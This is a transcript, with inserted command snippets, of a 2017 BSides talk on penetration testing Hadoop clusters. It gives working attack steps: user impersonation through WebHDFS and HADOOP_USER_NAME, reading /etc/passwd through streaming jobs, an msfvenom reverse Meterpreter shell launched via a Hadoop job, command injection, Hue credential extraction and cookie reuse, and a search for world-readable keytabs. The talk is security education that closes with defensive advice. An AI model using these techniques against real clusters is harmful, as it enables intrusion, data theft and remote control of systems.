
CG - Hadoop Safari : Hunting For Vulnerabilities - Mahdi Braik & Thomas Debize

BSides Las Vegas · 53:48 · 137 views · Published 2017-08 · Watch on YouTube ↗
About this talk
CG - Hadoop Safari: Hunting For Vulnerabilities - Mahdi Braik & Thomas Debize. Common Ground, BSidesLV 2017, Tuscany Hotel, July 25, 2017.
Transcript [en]

Thank you everyone for being here, we are really glad to be in Vegas, coming all the way from France. I'm Thomas, and this is Mahdi. A few points before starting: first, as we are French, please excuse our broken English. The second point: who are we? Basically some auditors in information security and incident response; we have been professionals for several years. So, what is the agenda today? Let me ask you something first: who is familiar with Hadoop? Who has ever heard about Hadoop or used MapReduce? Cool, a lot of people, that's great, so we'll be moving on quickly from the first part to the second.

In the first part we will briefly introduce Hadoop and its security model, to understand what the known limitations are. Then in the second section we will review how you can pwn a cluster and what the different steps are to assess the security of a Hadoop cluster, with a few tips and tricks, and by the end we will give you some recommendations. We have been auditing and penetration testing several Hadoop clusters, mostly for French clients, so we have gathered some experience on that topic and can hopefully give you some good advice. So, Hadoop: what is Hadoop? It is an open source framework that allows for the

distributed processing of large data sets, using simple programming models. You know the MapReduce algorithm: at the beginning it was invented by Google in order to sort and index web pages, very large amounts of web pages. Here is the principle — I won't detail it, but you can see that you have different phases, map, shuffle and reduce; the goal is to sort data using a lot of different nodes by grouping records on a key. That's the first point. Then, on the open source side of Hadoop: Hadoop is now backed by the Apache Foundation, has been for several years now, and is completely open

source and free. But in real life Hadoop comes packaged in distributions, just like Linux. The three main current distributions are the following: Cloudera, Hortonworks and MapR. In real life, 80 percent of the clusters you find are either Cloudera or Hortonworks. Cloudera has some proprietary stuff; Hortonworks is fully open source, built only on open source products, with a cheaper license fee; and MapR is doing "Hadoop without Hadoop": they fully understood what the Hadoop limitations in terms of performance are and are trying to bypass them — we will be talking about the NameNode limitation

just after. They fully understood the case and they are doing Hadoop without really being Hadoop; they just offer a connector for compatibility. But in real life we mostly see Cloudera and Hortonworks distributions. The common point is the use of the Apache Hadoop core framework, which is doing mostly only two things: basically Hadoop is about storing large data sets and processing large data sets, that's the only point. In real life, what does a real big data deployment look like? At the beginning you buy a lot of CPU, RAM and disk; on top of it you put the Hadoop core, and a lot of modules supporting the life

cycle of the data on the platform. You will see the different modules appear in this slide. For acquisition you have for instance relational or non-relational databases, and most importantly you have HDFS, the Hadoop Distributed File System, in order to store large data sets. Then for the processing you have a lot of really different modules — maybe the most popular right now are Apache Spark, Apache Hive, Apache Drill for SQL requests — and in the Hadoop core you have MapReduce and YARN: MapReduce, which is the algorithm used to distribute tasks, and YARN, which is a scheduler, like a plain operating system — and it's pretty

complicated, to be fair; it just schedules and manages resources on the cluster. Then you have some indexation modules — I guess you have heard about Elasticsearch or Solr. At the end you want to consume your data, so you have different modules for end users, mostly web applications, meant to be as friendly as possible: you have Jupyter, which used to be IPython Notebook, Hue, Tableau and SAS, which are not open source products, Kibana and so on. For the administration, typically for Cloudera you have Cloudera Manager, which is a proprietary product, and for Hortonworks you have Apache

Ambari, which handles all the supervision and administration of the cluster; each distribution has its own proprietary or specific management platform. And at the end, because that's why we are here today, security: you can see that for security there are really only two modules. You have Apache Knox, which is a gateway, and Ranger, which is the central policy management where you can apply authorization policies, protect data and put in place some ACLs. And you have Sentry, which is, you know, kind of a rival of Ranger, but in real life — Mahdi will tell you more after — it is kind of

broken, not really useful and not really user-friendly; it's a bit abandonware. And you have Record Service, which is coupled to Sentry. So for security you don't have many modules — that's the first observation you can make by looking at the ecosystem. A typical Hadoop system has two parts, as I said: storage and processing. You have some DataNodes, which store the actual data, and you have a single active NameNode, which typically holds the mapping list of the file paths. The NameNode knows, for your file — which is divided into blocks, different sub-files — where they are stored

among the DataNodes; the NameNode knows where you can retrieve the blocks of the file you want. For the processing, as I said, you have MapReduce and YARN: MapReduce being the job distribution on the cluster, and YARN being the scheduler. YARN is, as I said, pretty complicated stuff and we haven't been digging that much into its security — I guess there are some real vulnerabilities in there, to be fair. Right now you could say: okay, cool, but who really uses Hadoop anyway in real life? From the official Hadoop pages you can find the different providers and web giants using it, and you get an idea of their

number of nodes — a node being a server, to be fair, with a lot of resources: CPU, RAM and disk — and you can find that Yahoo has a lot of Hadoop nodes and is a massive maintainer and contributor to the project. Hi everyone. So now that we know what Hadoop is, I will present its security model. First let's talk about authentication. By default there is no real authentication mechanism implemented in Hadoop — or rather, the authentication mechanism called "simple" is what is implemented by default. Without Kerberos, which is the user authentication mechanism available on Hadoop, the cluster won't verify your identity: you pass the

string "hdfs", for example, and the cluster will trust that you are hdfs. So the two authentication modes are "simple", which is just identification, and Kerberos, which is more difficult to implement. Simple authentication is just identification: you can be whoever you want, on whichever service you want; you can perform any action with any username, you just have to provide the name. So to improve the security you have to implement the proper authentication mechanism, which is Kerberos. And be careful when you activate authentication, because on Hadoop you can end up with partial Kerberos authentication: for example, you have one parameter to

enable authentication on the whole cluster — but only on the Hadoop core. That's one parameter, but then you also have to enable authentication on the web pages, because there are a lot of web interfaces accessible to users, and if you do not enable that parameter — if you don't put Kerberos there — the services will still run with simple authentication and any user can be whoever he wants. Then you also have to disable the parameter which allows anonymous authentication, and then you also have to set the parameter to

activate authentication on the YARN service. So you have to put "kerberos" instead of "simple" on all these different parameters in order to activate Kerberos on all the services, not just on one of them. So be careful — that's a big deal, because we have seen several times authentication enabled but not on every interface, and in the end it's as if simple authentication were deployed: you can access the cluster as whatever user you want. So be careful: that's the first strong point of Hadoop security — remove all "simple" authentication — and that's not just one parameter, it's a bit tricky, but that's the first trap not to fall into.
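As a rough illustration of the parameters discussed here (property names can vary slightly between Hadoop versions), the settings live in `core-site.xml` and `yarn-site.xml`:

```xml
<!-- core-site.xml: Kerberos for the Hadoop core -->
<property>
  <name>hadoop.security.authentication</name>
  <value>kerberos</value>  <!-- default is "simple" -->
</property>
<!-- core-site.xml: Kerberos for the web interfaces -->
<property>
  <name>hadoop.http.authentication.type</name>
  <value>kerberos</value>
</property>
<!-- core-site.xml: forbid anonymous access to the web UIs -->
<property>
  <name>hadoop.http.authentication.simple.anonymous.allowed</name>
  <value>false</value>
</property>
<!-- yarn-site.xml: Kerberos for the YARN timeline service -->
<property>
  <name>yarn.timeline-service.http-authentication.type</name>
  <value>kerberos</value>
</property>
```

The point of the slide is exactly that these are four separate knobs: flipping only the first one leaves the web UIs on simple authentication.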

We will show you some attacks, on Hive and others, based on simple authentication. Next, authorization and auditing. As Thomas already showed, there are a lot of service components in a Hadoop cluster, and each of these components implements its own authorization and auditing model. For example you have HDFS, the Hadoop Distributed File System, which implements POSIX permissions with extended ACLs, like on Linux: you have a user, a group and others, and you can set permissions for each of them, and you can also use ACLs since version 2.5. Then you have for example Hive, a SQL DBMS on top of Hadoop, which implements authorization on SQL verbs:

for example you can grant SELECT access to one user and grant it to another user, and build the authorization model on these SQL-verb ACLs. With these two examples you see that there are two authorization models for two components, and that's the point: you have lots of authorization models, and it's difficult to manage. So you have some third-party components which are used to manage all these authorization models and to centralize their management, in order to simplify the administration; these components are also used to centralize the security and audit policies and the security logs. For example you have Apache

Ranger, which Thomas already talked about, which is the only serious component for security features: it allows auditing, log centralization, centralized administration of the authorization models, deployment of Kerberos, etc., and it is only packaged with Hortonworks, which is the most open source distribution you could use. Then you also have Apache Sentry and Cloudera Record Service, which come with a Cloudera cluster but are not as mature as Ranger. So for the moment the only strong third-party module is Ranger; with Sentry you can do something, but it's more difficult to administrate and it does not implement all the capabilities of

Ranger. Next, data protection. As the clusters are often used to store sensitive data, it's an important feature. You have two encryption features: encryption in transit, which is encryption of the data flows, and encryption at rest, which is encryption of the storage. These two features are available by default in Hadoop, but you have to implement Kerberos in order to activate them. So, encryption in transit: for the communication with the NameNode — the node which holds the index of the files — you have three available protection levels based on the Hadoop RPC scheme and its SASL mechanism. You have the "authentication"

setting, which adds no encryption, just authentication; then the "integrity" setting, which is authentication plus integrity; and "privacy", which is full encryption including authentication and integrity. For the communication with the web interfaces you also have, by default, the capability of activating SSL/TLS on these services, but it is not activated by default. Then for the communication with the DataNodes it's pretty much the same: you have the data transfer protocol, which involves a two-phase key exchange using 3DES and RC4 — not the strongest algorithms we know — and an encryption layer based on AES.
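A sketch of where these knobs live (again, property names may differ slightly per version):

```xml
<!-- core-site.xml: SASL quality of protection for Hadoop RPC -->
<property>
  <name>hadoop.rpc.protection</name>
  <value>privacy</value>  <!-- authentication | integrity | privacy -->
</property>
<!-- hdfs-site.xml: encrypt the DataNode data transfer protocol -->
<property>
  <name>dfs.encrypt.data.transfer</name>
  <value>true</value>
</property>
<!-- hdfs-site.xml: serve the HDFS web UIs over TLS only -->
<property>
  <name>dfs.http.policy</name>
  <value>HTTPS_ONLY</value>
</property>
```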

AES is used with different key sizes, 128 bits by default. Then you have the encryption at rest. Hadoop implements its own encryption model, which is based on two keys: the EZ key (encryption zone key), used to encrypt the directories on the cluster, and the DEK (data encryption key), which encrypts the files. So you have this diagram showing a minimal architecture: you have the NameNode, the clients and the KMS. The NameNode stores the EDEK, the encrypted DEK; the KMS holds the EZ keys and the ACLs. So you ask the NameNode for

the encrypted key, then you ask the KMS, which holds the ACLs; if you are allowed to access the key, the KMS gives you the decryption key, you can decrypt, manipulate the file and store it back afterwards. So here you can see that the security boundary is not the cryptosystem — it is not related to cryptography at all, but just to the ACLs and the robustness of the KMS, because the KMS holds all the keys: if you can own the KMS, you can access all the keys and decrypt all the data. It's not a crypto problem, the boundary is just the robustness of the KMS.
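For reference, an encryption zone of this kind is typically set up with the key-management and crypto subcommands. This is a sketch only: it assumes a running cluster with a KMS configured, and the key name and path (`ezkey1`, `/secure`) are made up for the example.

```shell
# create an EZ key inside the KMS, then turn a directory into an encryption zone
hadoop key create ezkey1 -size 128
hdfs dfs -mkdir /secure
hdfs crypto -createZone -keyName ezkey1 -path /secure
hdfs crypto -listZones    # verify the zone was created
```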

Just one word about the cryptography: you may ask what the overhead and the drawbacks are of using encryption in transit and at rest. To be clear, there is no real overhead for encryption in transit; this is pretty much what you already know with SSL/TLS — no real performance impact. But to be honest, for encryption at rest you do have a performance impact: the documentation speaks about 20%, and I think that's pretty correct — 20, maybe even 30 percent of performance lost, I would say. But that's the price to pay today in order to have encryption at rest. For defenders, watch out: encrypting or

ciphering the data at rest is not the very first action you have to implement. In most of the cases we've seen, encryption at rest is really mandatory for some regulations — I guess you have some in the US too — but this is, to be fair, not the first security measure to put in place. Encryption at rest comes at the end, but for compliance it is pretty much mandatory, and it is really common. So for the next part we will talk about mapping the attack surface. We are entering the second section, which focuses on the attack techniques; to be fair there is not much

defense in here — we will see some defensive measures after, but the point of this talk is really attacking: how you can attack a cluster and, in the end, improve its security. From our experience, a Hadoop deployment commonly follows one of the three following topologies. As an attacker, know your environment: know where you are and in which case you are conducting your assessment. First you have the simple topology where everything is exposed on the corporate network: you plug in in a meeting room and you can access everything, the infrastructure is fully exposed on the corporate network. So you can find, on this

flat network topology, some edge nodes. What is an edge node? It is like a bastion, a unique entry point to the cluster. It is basically a Linux server: you connect to it with SSH and it offers you the Hadoop native clients, in order to perform some actions that we will see after, like "hadoop fs -ls /some/path" and so on. This is for Hadoop users, so that they work on a standard host, with the same binaries and the same versions, instead of running

their actions from their own PCs with different versions and so on. Then you have the NameNode — you understood that the NameNode is a single point of failure, because without the NameNode you can't access anything on the cluster — and you have some DataNodes storing the data. As you may understand, this topology exposes a wide attack surface: you have a high probability of owning some stuff and accessing some data and resources. Then you have the second topology, which is a bit better, where you expose only the necessary end-user services, because in the end on a Hadoop cluster you don't have that many use cases, and

from a security point of view it's not good to have multiple entry points and multiple ways to access a cluster. So in that topology you only have the edge node and some web apps for consultation: Cloudera Hue, Jupyter (IPython Notebook), or Zeppelin, which is an open source alternative for the same usage — you have a notebook, you can input some commands and retrieve some data from different data sources. And then you have the internal network: this time, you can see,

the NameNode is not exposed on the corporate network, which is a bit better. In this topology the attack surface is really reduced, to be fair, because as an attacker plugged into the corporate network you won't see much, and in the end you must exploit trivial or default credentials on these services, or web vulnerabilities on the web apps, if any exist. And the last and most restrictive topology is the highly segregated one: from the corporate network you have a unique access point, which can be Citrix or a bastion or whatever — I won't quote brands, but you understood the idea of having one

dedicated entry point where you can implement logging, DLP and so on. From that bastion you reach the front-end Hadoop network, which is again the edge nodes and the web apps for the end users, and behind it you have the back end; imagine there are firewalls between each network, implementing granular access lists. In that topology you can see that in order to access the back end you really have to first get onto the bastion, which reduces the probability, and then you have to own some stuff from the edge node or the web apps. So again it

divides the probability, so the attack surface is really minimal, and as I said you have a unique access point into your Hadoop infrastructure where you can implement some more compensating security measures like logging and DLP. So the first step when you pentest a cluster will be to map the attack surface. First you will see a lot of services, if there is no network segregation or filtering, because as we already told you there are a lot of services available in a cluster: for example the HDFS-related services, such as this one, which is used for the IPC connections; then you have some web

interfaces and web APIs, for example this HTTP interface, which is used for example to browse the HDFS file system; and then you also have some YARN-related interfaces: first the IPC port, and then the HTTP port for viewing the logs of the YARN service and of the tasks. YARN, as I said, is the scheduler: it just schedules tasks, and from these services you can submit a task and follow its status. And then we listed some other stuff that you might see on a pentest of a cluster. Then, on the DataNodes, you also have a lot of services: this TCP

service is used for HDFS data transfers, and it is called when you use for example the "hadoop fs" command; then you have some interfaces which are pretty much the same as this one on the NameNode — a lot of interfaces commonly exposed on the DataNodes and the NameNode which are very verbose, and there is not much difference between them. And then you also have some YARN stuff on the DataNodes, for example on this port — I will show you some examples after. And then you also have some interesting third-party modules; we

did not list all the modules, but some interesting stuff: you have the HttpFS interface; you have Cloudera Manager, which is used to manage the cluster; you have Apache Ambari, which is pretty much the same as Cloudera Manager and is also used to manage the cluster; you have the Apache Ranger interface, Cloudera Hue, etc. So let's see the interfaces. Like I said before, here on the NameNode you have the interface where you can browse HDFS and see the different files, and you can also download them; all these interfaces are backed by an API, and there are some calls to the API that we will talk about after. You have

pretty much the same, but maybe a little bit more ugly, on the DataNode; it's the same thing, you can browse it, under another name. Then you have the YARN interfaces, which are used to view the jobs which are running, the containers launched, etc. On this one you can see which resources are currently used on the cluster, and then it's pretty much the same as the previous one: you have the job history of YARN. So you can use nmap in order to fingerprint these services.
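A plain service sweep covering the usual Hadoop ports might look like this. The port list reflects common defaults only (they vary across distributions and versions), and the target range is a placeholder.

```shell
# common default Hadoop ports:
#   8020  NameNode IPC      50070 NameNode HTTP
#   50010 DataNode data     50020 DataNode IPC    50075 DataNode HTTP
#   8088  ResourceManager   8042  NodeManager     19888 JobHistory
nmap -sV -p 8020,50070,50010,50020,50075,8088,8042,19888 10.10.0.0/24
```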

There are some scripts we have developed in order to identify these services — they are very easy to write — and the output looks like this one: you can see which service is listening, in order to map the network. So after you have done your mapping, the first thing you want to do is to access data. How would you like to do it? Through a browser, because you are lazy, really lazy: you want to use your own browser to access everything. So in the end you will be targeting the WebHDFS API which, as you may understand, is a way to access HDFS through a web API.

It offers a REST API to access data, and you can do pretty much everything with WebHDFS. And where can you find WebHDFS exposed? First on the HDFS web interfaces that I showed you before; also on the HttpFS module, which is just exposing WebHDFS; and in the end also on the Apache Knox gateway, which is exposing WebHDFS and some other stuff. Apache Knox is a security component, but it is only a gateway and it is only for network purposes: it is how you can filter and put in place a single entry point for your Hadoop infrastructure. So now, what if the cluster only enforces

simple authentication, which is again just identification? You can access any stored data by using the "user.name" parameter. That's not a bug, that's a feature — an authentication feature. Demo. So here you can see one of the web interfaces, where you can see a lot of variables and data from the configuration. If you go to "Browse the file system", you can browse and access whatever you want — and then you see the "Permission denied" message saying that by default I am "dr.who" and I cannot access that folder, because I am not the right user. And now, under the hood:

this is just calling the WebHDFS API that you can see here. You have your path on HDFS, you add some operation — LISTSTATUS, OPEN, whatever — so here I want to access the /user/hdfs directory, and it says I am not allowed because I am dr.who. But if there is really simple authentication and no Kerberos — which is the strong security point — you can input whatever you want: you can be "hdfs", and this time you can see and access everything, just by supplying a username. That's pretty ridiculous, but that's the security model.
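The call under the hood looks roughly like this; the hostname is a placeholder and 50070 is just the classic NameNode web port:

```shell
NN="namenode.example.com:50070"   # hypothetical NameNode address
# denied: without user.name you are the default web user "dr.who"
curl -s "http://${NN}/webhdfs/v1/user/hdfs?op=LISTSTATUS" || true
# "authenticated": simply claim to be the hdfs superuser
URL="http://${NN}/webhdfs/v1/user/hdfs?op=LISTSTATUS&user.name=hdfs"
curl -s "$URL" || true            # (fails here without a live cluster)
# op=OPEN streams a file's contents the same way
```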

That's why you have to implement Kerberos — this is a strong requirement. And then you can access some data directly, just from the file name. Besides — oh sorry, this one won't work because of some network stuff — but here I can access the file; the next step is to open it, and now I am able to get the complete directory tree of the cluster, which is really useful because you are there to access data. And yeah, we have been developing a tiny script for this — there is no magic in it, it is just automating some WebHDFS calls — and you can browse everything.

And now, if you want to access data through the CLI, the Hadoop native tooling, you can input the same username: the user name can be set as an environment variable. Here you can see that first I am denied because I am "toto"; then I set it to "hbase" — HBase being a non-relational database — and then I can access, I guess, everything. It's pretty much as simple as this — maybe bring up the demo — so you can access this, that's it.
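The environment variable in question is `HADOOP_USER_NAME`; a minimal sketch of the trick, assuming a cluster running simple authentication:

```shell
# with simple auth the Hadoop CLI takes this variable at face value
export HADOOP_USER_NAME=hdfs
# every subsequent command then runs as the hdfs superuser, e.g.:
if command -v hadoop >/dev/null; then
  hadoop fs -ls /user/hdfs
fi
```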

I guess you see the first point: when you work with Hadoop you think that big data is really quick and fast? No, that's a joke, because everything is in Java and everything is pretty much slow. So here I cannot access everything even though I am root — I am root, but not the correct user — so I will just say that I am "hdfs", run the same command on the temporary table, and this time I hope it will work… it worked, you can access it, there is no magic here. So that's the first part: being able to access some data on the cluster. But then we have some more interesting attacks, which Mahdi will introduce. Yes — after you have accessed the data, you want more: you want to execute code on the cluster. Remember, Hadoop is a framework made to execute jobs and commands.

So with simple authentication, as we have seen, you can do pretty much everything you want, so let's try to execute some code. Hadoop is developed in Java, so by default, I would say, you are forced to develop in Java; but people have developed the Hadoop streaming jar, which is used to execute any kind of script — Python, bash, etc. — on Hadoop. The command line is this one: you have "hadoop jar", you put the path to the streaming jar, you put the input file, which must not be empty, you put the output directory, and the mapper, for

example "/bin/cat /etc/passwd", and the reducer "NONE", because we won't use a reducer — that's just a slight optimization to be faster, since for this test you don't need a reducer. Then you check that the job has been successfully performed, and then you can read the output file: for example here you get the /etc/passwd file. So, as we have seen, there are a lot of steps in order to access the files and the data, and we want to optimize this process.
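The streaming invocation described above can be sketched as follows; the jar path is distribution-specific and hypothetical here, as is the choice of input file:

```shell
STREAMING_JAR=/usr/lib/hadoop-mapreduce/hadoop-streaming.jar  # path varies per distro
if command -v hadoop >/dev/null; then
  hdfs dfs -put /etc/hostname /tmp/in      # the input must exist and be non-empty
  hadoop jar "$STREAMING_JAR" \
      -input  /tmp/in \
      -output /tmp/out \
      -mapper "/bin/cat /etc/passwd" \
      -reducer NONE                        # skip the reduce phase: one step faster
  hdfs dfs -cat '/tmp/out/part-*'          # a worker node's /etc/passwd
fi
```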

We will use Metasploit in order to get a real interactive shell, with a reverse Meterpreter payload. The reverse Meterpreter payload is generated with the msfvenom command line; then you launch the Hadoop streaming job, adding the "-file" parameter, which is used to upload the MSF payload generated before onto the cluster, and then execute it. And you have to execute it in the background, so the process is not stopped after the timeout: if you don't background it, your process will be shut down after some time. So let's have a demo; this may take some time.
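A sketch of the payload generation and upload. The IP, port and file names are placeholders, and the exact way the demo backgrounds the payload isn't specified in the talk, so the `&` in the mapper command is one common approach rather than the speakers' verbatim command.

```shell
if command -v msfvenom >/dev/null; then
  # generate a Linux reverse Meterpreter payload
  msfvenom -p linux/x64/meterpreter/reverse_tcp \
      LHOST=10.0.0.5 LPORT=4444 -f elf -o met.elf
fi
if command -v hadoop >/dev/null; then
  # -file ships met.elf to the task's working directory on the worker node;
  # backgrounding keeps it alive past the mapper's lifetime
  hadoop jar hadoop-streaming.jar \
      -input /tmp/in -output /tmp/out-msf \
      -file met.elf \
      -mapper "chmod +x met.elf && ./met.elf &" \
      -reducer NONE
fi
```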

We will launch it and go on, and hopefully we will see the shell arrive on our computer. So here is my attacking machine — you can recognize Kali. Here I set up my listener to wait for the connection back, and then on the edge node I try to execute my reverse Meterpreter payload — for the demo we exposed the flow. So I guess it should be okay: this is just sending the payload, this is submitting the job — and the job is submitted, with a token. Okay, we just have to wait for our connection back. But like we said, Hadoop is

pretty slow, and even more so on our demo machines, so we have to wait. Here in the PuTTY window you see the server side — this is just for monitoring purposes, for the demo, to see when the payload gets executed; normally, as an attacker, you don't have access to that PuTTY window, you just sit with your Metasploit in your attacking environment. We just have to wait, and we don't know when it will be executed — that's the first point with big data: you don't know when your job will finish. So let's move on, and we will come back just after, when we see the shell arrive. Just a few additional

notes. Hadoop is a distributed processing model, so you will execute your code on many nodes, and you don't have the capability to choose on which node you want to execute it: you launch a MapReduce job and the Hadoop core chooses on which node it runs; you can't target a specific node. That's the first point: you can't target a specific node. Then you have to configure your Hadoop environment — we didn't show it because it's not very interesting in the demo, but you have to set up your environment in order to be able to call the Hadoop client executables. So you have to

retrieve the configuration, and in order to get it you can access, on pretty much all the web interfaces, the /conf path, and retrieve the configuration from there. There are also some vulnerabilities in third-party modules which allow unauthenticated users to access the configuration. So — yes, that's a bit long, but all right, we are able to execute code on the cluster. We are "yarn" here, which is normal, because "yarn" is the user used to execute jobs. So yes, there is no magic here: Hadoop just allows you to execute things.
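Pulling the configuration via the /conf path mentioned above can look like this; the host and port are placeholders (the same path exists on most Hadoop web UIs):

```shell
RM="resourcemanager.example.com:8088"   # hypothetical ResourceManager address
CONF_URL="http://${RM}/conf"
curl -s "$CONF_URL" || true             # dumps the effective configuration as XML
```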

But if your user is really malicious, he could execute another payload or something like that — we will show you a vulnerability after. Once you are on the cluster, you can browse the DataNode you are on and try to find some files, and we have found that some files are not well protected: for example, on the Hue interface, by default the configuration file is readable by anyone, so you can read it, and if you do, you get the database password used by Hue. So you could access the hashes, the usernames, etc.; but once you have access

By listing the session cookies you can simply take the administrator's session cookie and reuse it; this is one vulnerability we will show just after. We are just showing you that when you install Hue, its database is pretty much always on the same server, and the whole exploitation takes about ten minutes. Let's move on, thank you. So, we have developed a script to automatically retrieve a minimal client configuration; it is called HadoopSnooper and you can find it on GitHub. You just have to launch the script and it retrieves the configuration for you. So you may say: okay, that's good, but come on, who would expose this service on the internet anyway?
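For illustration only — this is not HadoopSnooper's actual code — the minimal client configuration such a script has to produce essentially boils down to a core-site.xml pointing at the NameNode discovered during recon:

```python
# Illustration (not the real HadoopSnooper implementation): render the
# minimal core-site.xml a Hadoop client needs, given a NameNode found
# during reconnaissance.
def core_site_xml(namenode_host, port=8020):
    """Render a minimal core-site.xml for a Hadoop client."""
    return """<?xml version="1.0"?>
<configuration>
  <property>
    <name>fs.defaultFS</name>
    <value>hdfs://{host}:{port}</value>
  </property>
</configuration>
""".format(host=namenode_host, port=port)

print(core_site_xml("10.0.0.5"))
```

Dropping this file into the client's configuration directory is enough for commands like `hdfs dfs -ls /` to talk to the remote cluster.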

Well, for instance with a Shodan request you can find a nice dork. Not all the results here are really Hadoop processes, but it's a good starting point to find some. So yes, the point is that there are already a lot of Hadoop clusters freely accessible on the internet. And some figures from a study we ran ourselves: the first point was to see whether there is even a simple Kerberos deployment, and from this figure I guess you understand that there are not many clusters with Kerberos implemented at all. Also — and watch out when we say "remove all simple auth" — the figures on the right show you,

for the few Kerberized clusters, how many have Kerberos fully implemented end-to-end, including on the HTTP interfaces: you can see zero. Again, that's cool, but come on, who's really interested in attacking that stuff? Well, in the media you can find some stories: there are ransoms going around, and some people are wiping Hadoop databases on the internet. You can find here a nice message — "no data for you, secure your cluster" — they are pretty much encrypting or removing everything and you have to pay a ransom, and you can find that in the media. So now, let's see how you can pwn a cluster through an insecure Hadoop component.

Here we are exposing a vulnerability that allows any authenticated user on the machine to impersonate — to steal the identity of — the hdfs user. This is patched now, but for this version you can find a lot of actual, current clusters carrying that vulnerability. Here, when you type that command — that's the real one — "hdfs groups &lt;something&gt;", it tries to retrieve the groups of a user, and the input is not escaped correctly, so you can execute anything, and you can see that the command is executed as the hdfs user.
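The bug class here is the classic one sketched below: user-controlled input concatenated into a shell command without escaping. This is an illustration of the pattern, not the actual Hadoop code — a harmless `echo` stands in for the real group-lookup binary:

```python
# Sketch of the bug class behind the "hdfs groups" vulnerability described
# above: a username is interpolated into a shell string without escaping,
# so a crafted "user" smuggles in an extra command. 'echo' is a harmless
# stand-in for the real group-resolution binary.
import subprocess

def lookup_groups_unsafe(user):
    # BAD: user-controlled input concatenated into a shell command
    return subprocess.run("echo groups-of " + user,
                          shell=True, capture_output=True, text=True).stdout

out = lookup_groups_unsafe("toto; echo INJECTED")
print(out)  # the injected command runs too
```

Because the real lookup runs under the hdfs identity, the injected command inherits that identity — which is the whole impersonation.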

And to attack a Kerberized cluster, there's no simpler trick than this: with this vulnerability you can go, from scratch, from your own identity to hdfs. Again, hdfs is the root user of the distributed file system; you can do everything you want on the distributed file system with that user. We did not find the vulnerability ourselves, but we documented the exploit, as nothing had been published — even though Hadoop is fully open source. Some demo time now, just to show you that we are not bullshitting you.


So I'm just trying to put a file, you know, into the session, to check that it's really executing — and now, if I can, just — yes: I am hdfs. So I moved from toto, a standard user with no privileges, to hdfs. That's the vulnerability and how you can exploit it. How bad is it? The prerequisite for this vulnerability is that the ShellBasedUnixGroupsMapping must be in use; this is not the default value, and we were not expecting to find many clusters with it. Again, some figures from our study of Hadoop on the internet: you can see in purple how many clusters are affected. Now, you also have some vulnerabilities in third-party modules — even security modules.

Take Apache Ranger: you can see a nice SQL injection, which you can use to dump user credentials — but those are hashed, so not that interesting — or, much better, dump session cookies and reuse them. That's easy: you don't have to crack anything. Remember that Ranger is the security module, and there is a SQL injection on its login page. Then, about Hue, which we already talked about: Hue is often installed on the edge node, which is accessible by every user, as we showed in the demo before, and there is a vulnerability in that the hue.ini configuration file is by default readable by everyone.

So you can just steal the credentials of the database, and then steal the cookies stored inside that database. As we showed, once we have the session cookie we can just take it and reuse it to access the administration interface of Hue. The mitigation is to harden the file permissions, but more importantly, not to install Hue on an edge node at all, because it is a web application: an edge node is like a client, you know, a remote client, and you don't have to deploy a web application on an edge node. That's just bad design.
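A sketch of that first step — pulling the database credentials out of a world-readable hue.ini. Hue's ini format uses configobj-style nested [[sections]], so a tiny hand-rolled parser is used here; the sample content is made up and stands in for /etc/hue/conf/hue.ini:

```python
# Sketch: extract the database password from a world-readable hue.ini.
# Hue uses configobj-style nested [[sections]], hence the minimal
# hand-rolled parser. The sample text is a made-up stand-in for the
# real configuration file.
def find_db_password(ini_text):
    """Return the password found in the [[database]] section, or None."""
    in_db = False
    for raw in ini_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_db = line.strip("[]") == "database"
        elif in_db and line.startswith("password"):
            return line.split("=", 1)[1].strip()
    return None

sample = """[desktop]
  [[database]]
    engine=mysql
    host=127.0.0.1
    password=hue_db_secret
"""
print(find_db_password(sample))  # hue_db_secret
```

With that password, querying the sessions table for the admin's cookie is a one-liner against the database.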

The recommendation was not really clear to us before, but now it is: do not install anything on an edge node except the Hadoop clients — hadoop, hdfs dfs, whatever — and no other application. And in the end, last but not least, our highly technical, highly skilled attack, our most elite attack: on Kerberized clusters, this command simply tries to find any keytab that is world-readable, and in real life it gives you that kind of result. In a grey-box engagement, with only one profile accessing an edge node or a server — a simple profile, no privileges — just with this command you will be able to collect keytabs and access 80% of the data lake.

That is because people misuse keytabs: they don't realize that a keytab is pretty much the same thing as a password, so they just leave the file with world-readable rights. So, as a defender, please put in place some detection measures — checking whether any keytabs are readable by everyone is already a strong measure — and beyond that simple verification, put in place some stricter access control, because people will keep misusing keytabs with world-readable permissions.
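That keytab hunt can be sketched like this: walk the filesystem and flag any *.keytab readable by "other". A scratch directory stands in for / here:

```python
# Sketch of the keytab hunt described above: walk a tree and flag any
# *.keytab file whose mode grants read access to "other". On a real
# engagement the walk would start at /; a scratch directory is used here.
import os, stat, tempfile

def world_readable_keytabs(root):
    """Return paths of *.keytab files whose mode grants read to 'other'."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.endswith(".keytab"):
                path = os.path.join(dirpath, name)
                if os.stat(path).st_mode & stat.S_IROTH:
                    hits.append(path)
    return hits

# Demo on a scratch directory: one exposed keytab, one protected one.
tmp = tempfile.mkdtemp()
for fname, mode in [("hdfs.keytab", 0o644), ("yarn.keytab", 0o600)]:
    p = os.path.join(tmp, fname)
    open(p, "w").close()
    os.chmod(p, mode)
print(world_readable_keytabs(tmp))  # only hdfs.keytab shows up
```

On an engagement, the shell equivalent would be something like `find / -name "*.keytab" -perm -o+r 2>/dev/null`.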

Now, if you also want to start hunting for these vulnerabilities, get on board with us: to study, you can use our prepackaged vulnerable node, which is really easy to install — it is a standalone virtual machine, and all the demos we performed ran on that machine. Get on board with us, try to find some stuff, and make the jump into Hadoop security. Everything we presented today — every tool, every bit — is published on our GitHub, and we are really eager for feedback and contributions. Now, taking a step back, you can see the security maturity of the Hadoop ecosystem: Hadoop is not a technology built with security in mind — no encryption by default.

No real authentication by default either. Then you have a fragmented ecosystem: Apache Ranger, for instance, is only packaged for one stack, Hortonworks. There is a lot of immaturity in secure development — you find a lot of classical vulnerabilities, even in the security modules — and you have complex operational security, because people will misuse Kerberos keytab files. So, some simple recommendations. First and most important: Kerberize your cluster, because, as we showed you, if you don't Kerberize the cluster you will have no security at all. Then, reduce the service exposure: we have seen that the services are very vulnerable and expose sensitive information

